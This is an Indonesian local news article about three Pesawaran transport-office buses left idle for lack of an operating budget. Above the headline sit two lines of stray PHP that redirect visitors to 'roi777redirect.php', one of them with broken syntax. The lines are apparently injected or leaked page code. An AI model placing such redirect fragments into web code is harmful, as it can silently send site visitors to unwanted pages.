header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Tak Miliki Biaya Operasional, Tiga Bus Dishub Mangkrak di Garasi -
Tak Miliki Biaya Operasional, Tiga Bus Dishub Mangkrak di Garasi

TRANSLAMPUNG.COM, PESAWARAN-Keberadaan 3 unit angkutan Bus Jatayu Trans Jurusan Gedong Tataan- kemiling milik Dinas Perhubungan (Dishub) Kabupaten Pesawaran mangrak di dalam Garasi Dishub Pesawaran.

Mangkraknya 3 unit kedaran Bus tersebut latar tidak terrealisasinya anggaran oprasiolan yang di ajukan oleh Dishub setempat kepada pemerintah Kabupaten Pesawaran .

Menurut Kapala Bidang ( Kabid) angkutan Darat Dishub Pesawaran Muhtador mengatakan bahwa pihaknya sudah mengajukan anggaran oprasional 3 kendaraan tersebut namun sampai saat ini belum ada realisasinya.

“Kedaraan itu memang sudah satu Bulan tidak beroprasi karna biyaya oprasionalnya memang tidak ada kita pernah mengajukan agaran itu kepemkab sejak kepemimpinan pak Mandawa selaku kadis yang lama tapi sampai saat ini belum terealisasi ,”Kata Muhtador saat di hubungi Senin (6/3).

Muhtador mengatakan bahwa pihaknya akan terus mengupayakan agaran oprasiol kepada pemkab namun masih menunggu pengajuan Anggaran Pendapatan Daerah Perubahan ( APBDP) Mendatang.

“Nanti dalam membahasan APBDP kita akan ajukan lagi mudah mudahan bisa terealisasi ,” kata dia.

Sampai berita ini diturunkan selaku kepala Dinas Perhubunga Kabupaten Pesawaran Andry Efendi belum bisa di konfirmasi meskipun sudah ditelpon dan disms tidak ada jawaban.(ydn)

News Reporter